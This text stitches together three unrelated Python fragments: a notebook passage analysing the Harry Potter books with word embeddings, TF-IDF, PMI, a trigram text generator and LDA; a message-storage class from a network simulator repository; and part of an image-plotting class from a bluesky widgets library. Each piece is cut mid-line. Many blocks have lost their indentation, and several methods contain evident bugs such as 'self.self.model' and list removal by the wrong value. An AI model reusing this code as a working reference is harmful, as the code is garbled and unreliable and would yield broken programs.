Create word embeddings for the tokens of book1 and book7 and look at the differences in most similar words for words they share
'''
# Book-1 embeddings. Two fixes relative to the original:
#  - the 'Book' label is 'Harry Potter 1', matching how the column is populated
#    ('Harry Potter %s' when the corpus is built) and the book-7 query below;
#    the source had a redacted '<NAME>' placeholder here;
#  - the freshly trained book-1 phraser (bigram_1) is applied, instead of
#    accidentally reusing the whole-corpus `bigram` phraser.
import multiprocessing

toklist_1 = corpustot[corpustot['Book'] == 'Harry Potter 1']['Tokens'].to_list()
phrases_1 = Phrases(toklist_1)
bigram_1 = Phraser(phrases_1)
bigrams_1 = list(bigram_1[toklist_1])
w2v_model_1 = Word2Vec(size=200,
                       window=15,
                       sample=0.00001,
                       iter=1000,
                       negative=5,
                       min_count=100,
                       # workers=-1 spawns no training threads in gensim; use all but one core
                       workers=max(1, multiprocessing.cpu_count() - 1),
                       hs=0)
w2v_model_1.build_vocab(bigrams_1)
w2v_model_1.train(bigrams_1, total_examples=w2v_model_1.corpus_count, epochs=w2v_model_1.epochs)
# In[16]:
w2v_model_1.wv.most_similar(positive=["harry"])
# In[17]:
# Book-7 embeddings, parallel to the book-1 cell. Bug fix: the original
# applied the whole-corpus `bigram` phraser; the phraser trained on book 7
# (bigram_7) is what this cell builds and should use.
import multiprocessing

toklist_7 = corpustot[corpustot['Book'] == 'Harry Potter 7']['Tokens'].to_list()
phrases_7 = Phrases(toklist_7)
bigram_7 = Phraser(phrases_7)
bigrams_7 = list(bigram_7[toklist_7])
w2v_model_7 = Word2Vec(size=200,
                       window=15,
                       sample=0.00001,
                       iter=1000,
                       negative=5,
                       min_count=100,
                       # workers=-1 spawns no training threads in gensim; use all but one core
                       workers=max(1, multiprocessing.cpu_count() - 1),
                       hs=0)
w2v_model_7.build_vocab(bigrams_7)
w2v_model_7.train(bigrams_7, total_examples=w2v_model_7.corpus_count, epochs=w2v_model_7.epochs)
# In[18]:
w2v_model_7.wv.most_similar(positive=["harry"])
# ### 2.2- ANALYSIS OF IMPORTANT TERMS: TF-IDF-TFIDF
# ###### Analysis of the most important terms and changes in the co-occurrences of the characters
# <a id="tfidf"></a>
# In[18]:
documents = corpustot['Instances'].to_list() #Defining the input which is a List of all the instances
# In[19]:
# Collect the instances of each book into `doc`, one list per book.
bookn = [1, 2, 3, 4, 5, 6, 7]
doc = []
for n in bookn:
    # The 'Book' column is populated as 'Harry Potter %s' when the corpus is
    # built, so match that exact label (the source had a redacted '<NAME>'
    # placeholder here, which would have matched nothing).
    docn = corpustot[corpustot['Book'] == 'Harry Potter %s' % n]['Instances'].to_list()
    doc.append(docn)
# doc is now a list of lists of instances, one inner list per book
# (doc[0] -> book 1, ..., doc[6] -> book 7)
# In[20]:
'''
Creating a DataFrame containing the most frequent unigrams and their tf, idf, tfidf measures
'''
uni_tfidf_vectorizer = TfidfVectorizer(analyzer='word', min_df=0.001, max_df=0.75, stop_words='english', sublinear_tf=True)
X = uni_tfidf_vectorizer.fit_transform(documents)
uni_vectorizer = CountVectorizer(analyzer='word', min_df=0.001, max_df=0.75, stop_words='english')
X2 = uni_vectorizer.fit_transform(documents)
#X.shape, X2.shape
uni_df = pd.DataFrame(data={'word': uni_vectorizer.get_feature_names(),
'tf': X2.sum(axis=0).A1,
'idf': uni_tfidf_vectorizer.idf_,
'tfidf': X.sum(axis=0).A1
})
uni_df = uni_df.sort_values(['tfidf', 'tf', 'idf'], ascending= False)
uni_df.head()
# In[21]:
'''
Creating a DataFrame containing the most frequent bigrams and their tf, idf, tfidf measures
'''
bi_tfidf_vectorizer = TfidfVectorizer(analyzer='word',
ngram_range=(2,2), #Now consider bigrams
min_df=0.001,
max_df=0.5,
stop_words='english',
sublinear_tf=True)
X = bi_tfidf_vectorizer.fit_transform(documents)
bi_vectorizer = CountVectorizer(analyzer='word', ngram_range=(2,2), min_df=0.001, max_df=0.5, stop_words='english')
X2 = bi_vectorizer.fit_transform(documents)
X.shape, X2.shape
bi_df = pd.DataFrame(data={'word': bi_vectorizer.get_feature_names(),
'tf': X2.sum(axis=0).A1,
'idf': bi_tfidf_vectorizer.idf_,
'tfidf': X.sum(axis=0).A1
})
bi_df = bi_df.sort_values(['tfidf','idf'], ascending= False)
bi_df.head(10)
# In[22]:
''' Comparing the most frequent bigrams of the different books '''
df_book =pd.DataFrame()
for i in range(0,7):
bi_tfidf_vectorizer = TfidfVectorizer(analyzer='word',
ngram_range=(2,2),
min_df=0.001,
max_df=0.5,
stop_words='english',
sublinear_tf=True)
X = bi_tfidf_vectorizer.fit_transform(doc[i])
bi_vectorizer = CountVectorizer(analyzer='word', ngram_range=(2,2), min_df=0.001, max_df=0.5, stop_words='english')
X2 = bi_vectorizer.fit_transform(doc[i])
X.shape, X2.shape
data={'Bookn': ['%s' %(i+1) for j in range(len(bi_vectorizer.get_feature_names()))],
'word': bi_vectorizer.get_feature_names(),
'tf': X2.sum(axis=0).A1,
'idf': bi_tfidf_vectorizer.idf_,
'tfidf': X.sum(axis=0).A1
}
b_df = pd.DataFrame.from_dict(data)
b_df = b_df.sort_values(['tfidf','idf'], ascending= False)
df_book = df_book.append(b_df)
#b_df = b_df.sort_values(['tfidf','idf'], ascending= False)
df_book.head()
# In[23]:
''' Analysing the co-occurrencies of the three main characters along the 7 books. Focus on_
-Harry and Ron (HR)
-Harry and Hermione (HHe)
-Ron and Hermione (RHe)
Does their frequency show some evidence that Ron and Hermione will become a couple? [YES]
'''
HR = df_book.loc[df_book['word'].isin(['harry ron','ron harry'])]
HRsum = HR.groupby('Bookn').sum()
HHe = df_book.loc[df_book['word'].isin(['harry hermione','hermione harry'])]
HHesum = HHe.groupby('Bookn').sum()
RHe = df_book.loc[df_book['word'].isin(['hermione ron','ron hermione'])]
RHesum = RHe.groupby('Bookn').sum()
HR_HHe = HRsum.join(HHesum,lsuffix='_hr', rsuffix='_hhe', on='Bookn')
HR_HHe_RHe = HR_HHe.join(RHesum.add_suffix('_rhe'), on='Bookn')
HR_HHe_RHe = HR_HHe_RHe[['tf_hr', 'tf_hhe','tf_rhe']]
HR_HHe_RHe
# ### 2.3- Pointwise Mutual Information (PMI)
# <a id="PMI"></a>
# In[24]:
corpus =[]
stopwords_ = set(stopwords.words('english'))
for i in corpustot['Tokens']:
corpus+=i
words =[word for word in corpus if len(word) > 2
and word not in stopwords_ ]
finder = BigramCollocationFinder.from_words(words)
bgm = BigramAssocMeasures()
score = bgm.mi_like
collocations = {'_'.join(bigram): pmi for bigram, pmi in finder.score_ngrams(score)}
Counter(collocations).most_common(10)
# ### 2.4- Language Generation using HP Books
# <a id="language-generation"></a>
#
# Implement Language Models to either sampling the next word or generate text
#
# In[25]:
toklist = corpustot['Tokens'].to_list() #List of lists of tokens is the input
# In[26]:
# Trigram language model over the HP token lists.
# counts[(u, v)][w] holds the (smoothed) number of times word w followed the
# bigram (u, v); the 0.001 defaultdict default acts as add-k smoothing so that
# unseen continuations get a small nonzero probability.
smoothing = 0.001
counts = defaultdict(lambda: defaultdict(lambda: smoothing))
for sentence in toklist:
    # Pad with two '*' start symbols and a 'STOP' end symbol so every real
    # word appears in a complete trigram context.
    tokens = ['*', '*'] + sentence + ['STOP']
    for u, v, w in nltk.ngrams(tokens, 3):
        counts[(u, v)][w] += 1
def logP(u, v, w):
    # Log conditional probability log P(w | u, v) under the smoothed counts.
    return np.log(counts[(u, v)][w]) - np.log(sum(counts[(u, v)].values()))
def sentence_logP(S):
    # Log probability of a whole token list S: sum of its trigram log-probs.
    tokens = ['*', '*'] + S + ['STOP']
    return sum([logP(u, v, w) for u, v, w in nltk.ngrams(tokens, 3)])
def sample_next_word(u, v):
    # Draw the next word from the multinomial distribution P(. | u, v).
    keys, values = zip(*counts[(u, v)].items())
    values = np.array(values)
    values /= values.sum()  # normalise counts into probabilities
    sample = np.random.multinomial(1, values)  # one-hot draw over the vocabulary
    return keys[np.argmax(sample)]
def input_generate(initial=None):
    """Generate text by sampling the trigram model until 'STOP' is drawn.

    Parameters
    ----------
    initial : list of str, optional
        Seed tokens the first samples are conditioned on (default: none).

    Returns
    -------
    str
        The seed plus all sampled words, space-joined, without the '*'
        padding symbols or the terminating 'STOP'.
    """
    # Fixes relative to the original: the mutable default argument
    # (initial=[]) is replaced by the None sentinel, the pre-loop sampling
    # step that duplicated the loop body is folded into a single loop, and
    # the unreachable trailing `return initial` dead code is removed.
    result = ['*', '*'] + (initial if initial is not None else [])
    while True:
        next_word = sample_next_word(result[-2], result[-1])
        result.append(next_word)
        if next_word == 'STOP':
            break
    # Drop the two '*' pads and the trailing 'STOP'.
    return ' '.join(result[2:-1])
# In[27]:
sample_next_word('hermione','say'), counts[('hermione', 'say')]
# In[30]:
print(input_generate(['harry', 'look']))
# ### 2.5- TOPIC MODELING
# <a id="topic"></a>
#
# #### 2.5.1- LDA Topic Modeling
# <a id="LDA"></a>
# In[31]:
#LDA TOPIC MODELING ; Apply LDA Topic Modeling on bigrams
#Create the relevant documents to be used and the dictionary
sent_big = pd.Series(bigrams)
dictionary_big = Dictionary(sent_big)
dictionary_big.filter_extremes(no_below=50, no_above=0.2)
print(dictionary_big, flush=True)
print("translating corpus to IDs", flush=True) #Convert the corpus into its numerical IDs
ldacorpus = [dictionary_big.doc2bow(text) for text in sent_big]
print("tf-idf transformation", flush=True)
tfidfmodel = TfidfModel(ldacorpus)
model_corpus = tfidfmodel[ldacorpus]
print(sent_big[0])
print(ldacorpus[0])
print(model_corpus[0])
# In[38]:
#Computing the c_v score to choose the best number of topics
coherence_values = []
dev_size = 30000 #Size of the training set
eval_size = 30000 #Size of the evaluation set
for num_topics in range(5,15):
model = LdaMulticore(corpus=model_corpus[:dev_size],
id2word=dictionary_big,
num_topics=num_topics)
coherencemodel_cv = CoherenceModel(model=model,
texts=sent_big[dev_size:dev_size+eval_size],
dictionary=dictionary_big,
coherence='c_v')
cv_score = coherencemodel_cv.get_coherence()
print(num_topics, cv_score)
coherence_values.append((num_topics,cv_score))
# In[39]:
#Visualize the trend of the c_v score
import matplotlib.pyplot as plt
sns.set_context('poster')
scores = pd.DataFrame(coherence_values, columns=['num_topics','CV'])
scores.plot.line(x='num_topics', y='CV', xticks=range(5,16));
# In[40]:
#Based on the c_v score results, a number of topics around 9-10 seems to be appropriate.
#Although higher numbers of topics still have high c_v values, they might be hard to interpret and not so precise
num_topics = 10
num_passes = 10
# Aim for roughly 200 document-chunk updates over the whole training run.
# Integer division (with a floor of 1) is used because Python 3's true
# division yields a float, and gensim's `chunksize` expects an integer
# number of documents per training chunk.
chunk_size = max(1, len(model_corpus) * num_passes // 200)
print(chunk_size)
start = time.time()
print("fitting model", flush=True)
model = LdaMulticore(num_topics=num_topics,
                     corpus=model_corpus,
                     id2word=dictionary_big,
                     # cap workers at 10, leaving one core for the main process
                     workers=min(10, multiprocessing.cpu_count() - 1),
                     passes=num_passes,
                     chunksize=chunk_size,
                     alpha=0.5)  # symmetric document-topic prior
print("done in {}".format(time.time() - start), flush=True)
topic_corpus = model[model_corpus]
#topic_corpus[0]
#Print the topics in a more readable format, transforming them using RegEx
topic_sep | |
<reponame>Chrisys93/IcarusRepoSEND
# -*- coding: utf-8 -*-
from __future__ import division
import time
from collections import deque, defaultdict
import random
import abc
import copy
import numpy as np
from icarus.util import inheritdoc, apportionment
from icarus.registry import register_repo_policy
__all__ = [
'RepoStorage',
'RepoNull'
]
# noinspection PyTypeChecker
@register_repo_policy('REPO_STORAGE')
class RepoStorage(object):
    def __init__(self, node, model, contents, storageSize, compressionRate=0.5):
        """
        Constructor.

        Parameters
        ----------
        node :
            The node this repo storage is attached to.
        model :
            The network model; ``model.comp_size[node]`` determines whether
            this node has processing capability.
        contents :
            Optional mapping of initial contents used to pre-populate storage.
        storageSize :
            Total storage capacity of this repo.
        compressionRate : float
            Compression ratio used to derive the processed-message space.
        """
        self.node = node
        self.model = model
        # self.messages =
        # Collection
        # Message collections, split by processing state.
        self.Messages = []
        self.processMessages = []
        self.processedMessages = []
        self.storedMessages = []
        # Space accounting (sizes in the same units as msg_size).
        self.storageSize = storageSize
        self.processSize = 0
        self.Size = 0
        self.processedSize = 0
        # Reporting counters: freshness, satisfaction, processing state.
        self.mFresh = 0
        self.mStale = 0
        self.mOvertime = 0
        self.mSatisfied = 0
        self.mUnSatisfied = 0
        self.mUnProcessed = 0
        # Storage-time statistics (count, average, max, running sum).
        self.mStorTimeNo = 0
        self.mStorTimeAvg = 0
        self.mStorTimeMax = 0
        self.mStorTime = 0
        self.nrofDeletedMessages = 0
        self.deletedMessagesSize = 0
        self.totalReceivedMessages = 0
        self.totalReceivedMessagesSize = 0
        # Depletion accounting, per category (proc / cloud-proc / unproc / total).
        self.depletedProcMessages = 0
        self.oldDepletedProcMessagesSize = 0
        self.depletedProcMessagesSize = 0
        self.depletedCloudProcMessages = 0
        self.oldDepletedCloudProcMessagesSize = 0
        self.depletedCloudProcMessagesSize = 0
        self.depletedUnProcMessages = 0
        self.depletedUnProcMessagesSize = 0
        self.depletedPUnProcMessages = 0
        self.depletedPUnProcMessagesSize = 0
        self.oldDepletedUnProcMessagesSize = 0
        self.depletedMessages = 0
        self.depletedMessagesSize = 0
        self.oldDepletedMessagesSize = 0
        self.depletedCloudMessages = 0
        self.oldDepletedCloudMessagesSize = 0
        self.depletedCloudMessagesSize = 0
        self.cachedMessages = 0
        # Only compute-capable nodes get processed-message space.
        if self.model.comp_size[node]:
            # self.processSize = processSize
            self.compressionRate = compressionRate
            processedRatio = self.compressionRate * 2
            self.processedSize = self.storageSize / processedRatio
        if contents is not None:
            for content in contents:
                self.addToStoredMessages(contents[content])
    def getTotalStorageSpace(self):
        """Return the total (configured) storage capacity of this repo."""
        return self.storageSize
    def getTotalProcessedSpace(self):
        """Return the space reserved for processed messages (0 on non-compute nodes)."""
        return self.processedSize
def getStoredMessagesCollection(self):
self.messages = self.Messages
self.messages.extend(self.processMessages)
return self.messages
def getStoredMessages(self):
self.storedMessages = self.Messages
self.storedMessages.extend(self.processMessages)
return self.storedMessages
    def getProcessMessages(self):
        """Return the internal list of messages awaiting processing."""
        return self.processMessages
    def getMessages(self):
        """Return the internal list of stored (non-processing) messages."""
        return self.Messages
# @profile
def addToStoredMessages(self, sm):
"""
TODO: Check indentation herenot (in original, java implementation)
Also, check the "selfs" in the parantheses. Those should mostly
be the associated objects for which the functions are called.
Does the cache have to have a node, or is IT the node? Should
the simulator reference a node, for routing, or the cache itself?
"""
if (sm is not None):
if sm["service_type"].lower() == "non-proc":
self.Messages.append(sm)
self.Size += sm['msg_size']
elif sm["service_type"].lower() == "proc":
self.processMessages.append(sm)
self.processSize += sm['msg_size']
elif sm["service_type"].lower() == "processed":
self.processedMessages.append(sm)
elif (sm["service_type"]).lower() == "unprocessed":
self.Messages.append(sm)
self.Size += sm['msg_size']
else:
self.addToDeplMessages(sm)
self.totalReceivedMessages += 1
self.totalReceivedMessagesSize += sm['msg_size']
# add space used in the storage space """
# System.out.prln("There is " + self.getMessagesSize + " storage used")
# if (self.Size + self.processSize) >= self.storageSize:
# for app in self.node.getRouter(self.node).getApplications("ProcApplication"):
# self.procApp = app
# # System.out.prln("App ID is: " + self.procApp.getAppID)
#
# self.procApp.updateDeplBW(self.node)
# self.procApp.deplStorage(self.node)
    def addToDeplMessages(self, sm):
        """
        Account for a message being depleted: bump the depletion totals and
        fold the message's flags (overtime, satisfaction, processing state,
        storage time) into the report counters.

        If the message has no 'storTime' yet, one is computed from the
        current wall clock and written back into the message dict.
        """
        if sm is not None:
            self.depletedMessages += 1
            self.depletedMessagesSize += sm['msg_size']
            if sm['overtime']:
                self.mOvertime += 1
            if sm["service_type"] == "unprocessed":
                self.mUnProcessed += 1
                self.depletedUnProcMessages += 1
                self.depletedUnProcMessagesSize += sm['msg_size']
            if sm['satisfied']:
                self.mSatisfied += 1
            else:
                self.mUnSatisfied += 1
            # Storage-time stats: use the recorded storTime if present,
            # otherwise derive it from the receive time (side effect: the
            # derived value is stored back into the message).
            if 'storTime' in sm:
                self.mStorTimeNo += 1
                self.mStorTime += sm['storTime']
                if self.mStorTimeMax < sm['storTime']:
                    self.mStorTimeMax = sm['storTime']
            else:
                curTime = time.time()
                sm['storTime'] = curTime - sm['receiveTime']
                self.mStorTimeNo += 1
                self.mStorTime += sm['storTime']
                if self.mStorTimeMax < sm['storTime']:
                    self.mStorTimeMax = sm['storTime']
    def addToDeplProcMessages(self, sm):
        """
        Account for a to-be-processed message being depleted.

        Unlike addToDeplMessages, an overtime message here is also counted
        as unsatisfied, and there is no independent 'satisfied' check.

        NOTE(review): this reads ``sm['storTime']`` directly, which raises
        KeyError when the key is absent (addToDeplMessages uses
        ``'storTime' in sm``) -- confirm all callers set it.
        """
        if (sm is not None):
            self.depletedProcMessages += 1
            self.depletedProcMessagesSize += sm['msg_size']
            if (sm['overtime']):
                self.mOvertime += 1
                self.mUnSatisfied += 1
            if (sm["service_type"] == "unprocessed"):
                self.mUnProcessed += 1
                self.depletedUnProcMessages += 1
                self.depletedUnProcMessagesSize += sm['msg_size']
            # Storage-time stats; a missing/None storTime is derived from the
            # receive time and written back into the message.
            if (sm['storTime'] is not None):
                self.mStorTimeNo += 1
                self.mStorTime += sm['storTime']
                if (self.mStorTimeMax < sm['storTime']):
                    self.mStorTimeMax = sm['storTime']
            else:
                curTime = time.time()
                sm['storTime'] = curTime - sm['receiveTime']
                self.mStorTimeNo += 1
                self.mStorTime += sm['storTime']
                if (self.mStorTimeMax < sm['storTime']):
                    self.mStorTimeMax = sm['storTime']
    def addToCloudDeplMessages(self, sm):
        """
        Account for a message being depleted towards the cloud, then delete
        it from whichever local collection still holds it.

        NOTE(review): reads ``sm['storTime']`` directly (KeyError when
        absent) -- same caveat as addToDeplProcMessages.
        """
        if (sm is not None):
            self.depletedCloudMessages += 1
            self.depletedCloudMessagesSize += sm['msg_size']
            if (sm['overtime']):
                self.mOvertime += 1
            if (sm["service_type"] == "unprocessed"):
                self.mUnProcessed += 1
                self.depletedUnProcMessages += 1
                self.depletedUnProcMessagesSize += sm['msg_size']
            if (sm['satisfied']):
                self.mSatisfied += 1
            else:
                self.mUnSatisfied += 1
            if (sm['storTime'] is not None):
                self.mStorTimeNo += 1
                self.mStorTime += sm['storTime']
                if (self.mStorTimeMax < sm['storTime']):
                    self.mStorTimeMax = sm['storTime']
            else:
                curTime = time.time()
                sm['storTime'] = curTime - sm['receiveTime']
                self.mStorTimeNo += 1
                self.mStorTime += sm['storTime']
                if (self.mStorTimeMax < sm['storTime']):
                    self.mStorTimeMax = sm['storTime']
            # Remove the message from local storage now that it is depleted.
            self.deleteAnyMessage(sm['content'])
def addToDeplUnProcMessages(self, sm):
sm.update("type", "unprocessed")
self.self.model.repoStorage[self.node].addToStoredMessages(sm)
def addToDepletedUnProcMessages(self, sm):
if (sm is not None):
if (sm["service_type"] == "unprocessed"):
self.depletedUnProcMessages += 1
self.depletedUnProcMessagesSize += sm['msg_size']
self.mUnProcessed += 1
def getMessage(self, MessageId):
Message = None
for temp in self.Messages:
if (temp['content'] == MessageId):
i = self.Messages.index(temp)
Message = self.Messages[i]
return Message
def getProcessedMessage(self, MessageId):
processedMessage = None
for temp in self.processedMessages:
if (temp['content'] == MessageId):
i = self.processedMessages.index(temp)
processedMessage = self.processedMessages[i]
return processedMessage
def getProcessMessage(self, MessageId):
processMessage = None
for temp in self.processMessages:
if (temp['content'] == MessageId):
i = self.processMessages.index(temp)
processMessage = self.processMessages[i]
return processMessage
    def getStorTimeNo(self):
        """Return the number of storage-time samples recorded so far."""
        return self.mStorTimeNo
def getStorTimeAvg(self):
self.mStorTimeAvg = self.mStorTime / self.mStorTimeNo
return self.mStorTimeAvg
    def getStorTimeMax(self):
        """Return the largest storage time seen so far."""
        return self.mStorTimeMax
    @property
    def getNrofMessages(self):
        """Number of stored (non-processing) messages."""
        # NOTE(review): this is a @property while the sibling getNrof*
        # accessors are plain methods, so call sites differ -- confirm
        # which form is intended.
        return len(self.Messages)
    def getNrofProcessMessages(self):
        """Return the number of messages awaiting processing."""
        return len(self.processMessages)
    def getNrofProcessedMessages(self):
        """Return the number of fully processed messages."""
        return len(self.processedMessages)
    def getMessagesSize(self):
        """Return the running total size of stored (non-processing) messages."""
        return self.Size
def getStaleMessagesSize(self):
curTime = time.time()
size = 0
for m in self.Messages:
retrieval = m['receiveTime']
if m['shelf_life'] is not None and m['shelf_life'] <= curTime - retrieval:
size += m['msg_size']
return size
    def getProcMessagesSize(self):
        """Return the running total size of messages awaiting processing."""
        return self.processSize
def getProcessedMessagesSize(self):
processedUsed = 0
for msg in self.processedMessages:
processedUsed += msg['msg_size']
return processedUsed
def getFullCachedMessagesNo(self):
"""
Need to add the feedback "functions" and erfacing
TODO: Add the outward feedback message generation definitions,
like the gets below, under them.
"""
proc = self.cachedMessages
self.cachedMessages = 0
return proc
"""
*Returns the node self repo storage system is in
* @ return The node object
"""
    def getnode(self):
        """Return the node this repo storage system is attached to."""
        return self.node
    def hasMessage(self, MessageId, labels):
        """
        Look a message up by id or by label set across the three
        collections (processed, stored, to-be-processed).

        When ``MessageId`` is given, a message matches on its 'content'
        key; otherwise it matches when the intersection of its labels with
        *labels* equals *labels*.

        NOTE(review): later collections overwrite earlier hits, so the
        *last* match wins (processMessages has the highest priority), and
        the comparison ``j_labels == labels`` is order-sensitive -- both
        behaviors are preserved as-is here.

        :param MessageId: id ('content') to search for, or None
        :param labels: labels to match when MessageId is None
        :return: the matching message dict, or None
        """
        answer = None
        for i in range(0, len(self.processedMessages)):
            if MessageId is not None and self.processedMessages[i]['content'] == MessageId:
                answer = self.processedMessages[i]
            elif labels:
                j_labels = []
                for label in self.processedMessages[i]['labels']:
                    if label in labels:
                        j_labels.append(label)
                if (j_labels == labels):
                    answer = self.processedMessages[i]
        for i in range(0, len(self.Messages)):
            if MessageId is not None and self.Messages[i]['content'] == MessageId:
                answer = self.Messages[i]
            elif labels:
                j_labels = []
                for label in self.Messages[i]['labels']:
                    if label in labels:
                        j_labels.append(label)
                if (j_labels == labels):
                    answer = self.Messages[i]
        for i in range(0, len(self.processMessages)):
            if MessageId is not None and self.processMessages[i]['content'] == MessageId:
                answer = self.processMessages[i]
            elif labels:
                j_labels = []
                for label in self.processMessages[i]['labels']:
                    if label in labels:
                        j_labels.append(label)
                if (j_labels == labels):
                    answer = self.processMessages[i]
        return answer
    def getProcessedMessages(self, labels):
        """
        Return a message matching the given labels, searched across all
        three collections.

        NOTE(review): despite the plural name this returns a single
        message; like hasMessage, the last match wins and the label
        comparison is order-sensitive -- preserved as-is.

        :param labels: labels to match (all must be present, in order)
        :return: the matching message dict, or None
        """
        answer = None
        for i in range(0, len(self.processedMessages)):
            j_labels = []
            for label in self.processedMessages[i]['labels']:
                if label in labels:
                    j_labels.append(label)
            if (j_labels == labels):
                answer = self.processedMessages[i]
        for i in range(0, len(self.Messages)):
            j_labels = []
            for label in self.Messages[i]['labels']:
                if label in labels:
                    j_labels.append(label)
            if (j_labels == labels):
                answer = self.Messages[i]
        for i in range(0, len(self.processMessages)):
            j_labels = []
            for label in self.processMessages[i]['labels']:
                if label in labels:
                    j_labels.append(label)
            if (j_labels == labels):
                answer = self.processMessages[i]
        return answer
def deleteMessage(self, MessageId):
for i in range(0, len(self.Messages)-1):
if (self.Messages[i]["content"] == MessageId):
self.Size -= self.Messages[i]['msg_size']
self.Messages.remove(i)
return True
return False
"""
*Method
for deleting specific message to be processed
* @ param MessageId ID of message to be deleted
* @
return successful
deletion
status
"""
def deleteProcMessage(self, MessageId):
for i in (0, len(self.processMessages)-1):
if (self.processMessages[i]['content'] == MessageId):
self.processSize -= self.processMessages[i]['msg_size']
self.processMessages.remove(self.processMessages[i])
return True
return False
"""
*Method
for deleting specific message from storage
* @ param MessageId ID of message to be deleted
* @
return successful
deletion
status
"""
    def deleteAnyMessage(self, MessageId):
        """
        Delete the message with the given id from whichever collection
        holds it, dispatching on its service type.

        NOTE(review): messages are stored with service_type "non-proc"
        (hyphenated) by addToStoredMessages, but this checks "nonproc" --
        that branch can never match; confirm the canonical spelling.
        NOTE(review): the deleted-message counters are only updated when
        ``self.model.repoStorage[self.node]`` is falsy, and ``m`` may be
        None at that point -- looks inverted/unsafe; confirm intent.

        :param MessageId: id ('content') of the message to delete
        :return: True when a deletion happened, False otherwise
        """
        m = self.hasMessage(MessageId, [])
        if m is not None:
            if m["service_type"].lower() == "proc" and self.deleteProcMessage(MessageId):
                return True
            elif m["service_type"].lower() == "nonproc" and self.deleteMessage(MessageId):
                return True
            elif m["service_type"].lower() == "unprocessed" and self.deleteMessage(MessageId):
                return True
        if not self.model.repoStorage[self.node]:
            self.nrofDeletedMessages += 1
            self.deletedMessagesSize += m['msg_size']
        return False
"""
*Method
for deleting specific processed message
* @ param MessageId ID of message to be deleted
* @
return successful
deletion
status
"""
    def deleteProcessedMessage(self, MessageId, report):
        """
        Delete a processed message after it has been "sent"/depleted,
        optionally folding its flags into the report counters.

        NOTE(review): ``range(0, len-1)`` skips the last element, and
        ``remove(i)`` removes by *value* (the integer i) rather than by
        index -- both look like latent bugs carried over from the Java
        original; left unchanged here pending confirmation.
        TODO: Check the ifs in original code - make code right. did not
        report every message.  Reporting is not done right.
        """
        for i in range(0, len(self.processedMessages)-1):
            if self.processedMessages[i]['content'] == MessageId:
                self.depletedCloudProcMessages += 1
                self.depletedCloudProcMessagesSize += self.processedMessages[i]['msg_size']
                if (report):
                    # Each flag may be absent (None) or a boolean; only a
                    # real boolean value updates the counters.
                    if (self.processedMessages[i]['overtime'] is not None):
                        if (self.processedMessages[i]['overtime']):
                            self.mOvertime += 1
                    if (self.processedMessages[i]['satisfied'] is not None):
                        if (self.processedMessages[i]['satisfied']):
                            self.mSatisfied += 1
                        else:
                            self.mUnSatisfied += 1
                    if (self.processedMessages[i]['Fresh'] is not None):
                        if (self.processedMessages[i]['Fresh']):
                            self.mFresh += 1
                        elif (not self.processedMessages[i]['Fresh']):
                            self.mStale += 1
                self.processedMessages.remove(i)
                return True
| |
there are only two dimensions.
Parameters
----------
field : string
Field name or expression
max_runs : Integer
Number of Runs to visualize at once. Default is 1.
label_maker : Callable, optional
Expected signature::
f(run: BlueskyRun, y: String) -> label: String
needs_streams : List[String], optional
Streams referred to by field. Default is ``["primary"]``
namespace : Dict, optional
Inject additional tokens to be used in expressions for x and y
axes : Axes, optional
If None, an axes and figure are created with default labels and titles
derived from the ``x`` and ``y`` parameters.
Attributes
----------
max_runs : int
Number of Runs to visualize at once. This may be changed at any point.
(Note: Increasing it will not restore any Runs that have already been
removed, but it will allow more new Runs to be added.) Runs added
with ``pinned=True`` are exempt from the limit.
runs : RunList[BlueskyRun]
As runs are appended entries will be removed from the beginning of the
last (first in, first out) so that there are at most ``max_runs``.
pinned : Frozenset[String]
Run uids of pinned runs.
figure : Figure
axes : Axes
field : String
Read-only access to field or expression
needs_streams : List[String], optional
Read-only access to streams referred to by field.
namespace : Dict, optional
Read-only access to user-provided namespace
Examples
--------
>>> model = Images("ccd")
>>> from bluesky_widgets.jupyter.figures import JupyterFigure
>>> view = JupyterFigure(model.figure)
>>> model.add_run(run)
"""
# TODO: fix x and y limits here
    def __init__(
        self,
        field,
        *,
        max_runs=1,
        label_maker=None,
        needs_streams=("primary",),
        namespace=None,
        axes=None,
    ):
        super().__init__()
        if label_maker is None:
            # scan_id is always generated by RunEngine but not strictly required by
            # the schema, so we fail gracefully if it is missing.
            def label_maker(run, field):
                md = run.metadata["start"]
                return f"Scan ID {md.get('scan_id', '?')} UID {md['uid'][:8]} " f"{auto_label(field)}"
        self._field = field
        self._label_maker = label_maker
        self._namespace = namespace
        # Create fresh axes/figure unless the caller supplied axes.
        if axes is None:
            axes = Axes()
            figure = Figure((axes,), title="")
        else:
            figure = axes.figure
        self.axes = axes
        self.figure = figure
        # If the Axes' figure is not yet set, listen for it to be set.
        if figure is None:
            def set_figure(event):
                self.figure = event.value
                # This occurs at most once, so we can now stop listening.
                self.axes.events.figure.disconnect(set_figure)
            self.axes.events.figure.connect(set_figure)
        # The RunManager enforces max_runs and fires run_ready when a run's
        # required streams are available; delegate add/discard to it.
        self._run_manager = RunManager(max_runs, needs_streams)
        self._run_manager.events.run_ready.connect(self._add_images)
        self.add_run = self._run_manager.add_run
        self.discard_run = self._run_manager.discard_run
    def _add_images(self, event):
        """Create an Image artist for the newly-ready run and display it."""
        run = event.run
        # Bind the field now so the artist callback only needs the run data.
        func = functools.partial(self._transform, field=self.field)
        image = Image.from_run(func, run, label=self.field)
        self._run_manager.track_artist(image, [run])
        self.axes.artists.append(image)
        self.axes.title = self._label_maker(run, self.field)
        # TODO Set axes x, y from xarray dims
def _transform(self, run, field):
result = call_or_eval({"array": field}, run, self.needs_streams, self.namespace)
# If the data is more than 2D, take the middle slice from the leading
# axis until there are only two axes.
data = result["array"]
while data.ndim > 2:
if data.shape[0] == 0:
# Handle case where array is just initialized, with a shape like (0, y, x).
data = numpy.zeros(data.shape[1:])
continue
middle = data.shape[0] // 2
data = data[middle]
result["array"] = data
return result
    @property
    def field(self):
        """Read-only access to the field name or expression."""
        return self._field
    @property
    def namespace(self):
        """Read-only view of the user-provided namespace (empty dict if unset)."""
        return DictView(self._namespace or {})
# Expose some properties from the internal RunManger helper class.
    @property
    def runs(self):
        """The Runs currently being visualized (delegated to the RunManager)."""
        return self._run_manager.runs
    @property
    def max_runs(self):
        """Maximum number of Runs to visualize at once."""
        return self._run_manager.max_runs
    @max_runs.setter
    def max_runs(self, value):
        # Forward to the RunManager, which enforces the limit.
        self._run_manager.max_runs = value
    @property
    def needs_streams(self):
        """Read-only access to the streams referred to by the field."""
        return self._run_manager._needs_streams
    @property
    def pinned(self):
        """Run uids of pinned runs (exempt from the max_runs limit)."""
        return self._run_manager._pinned
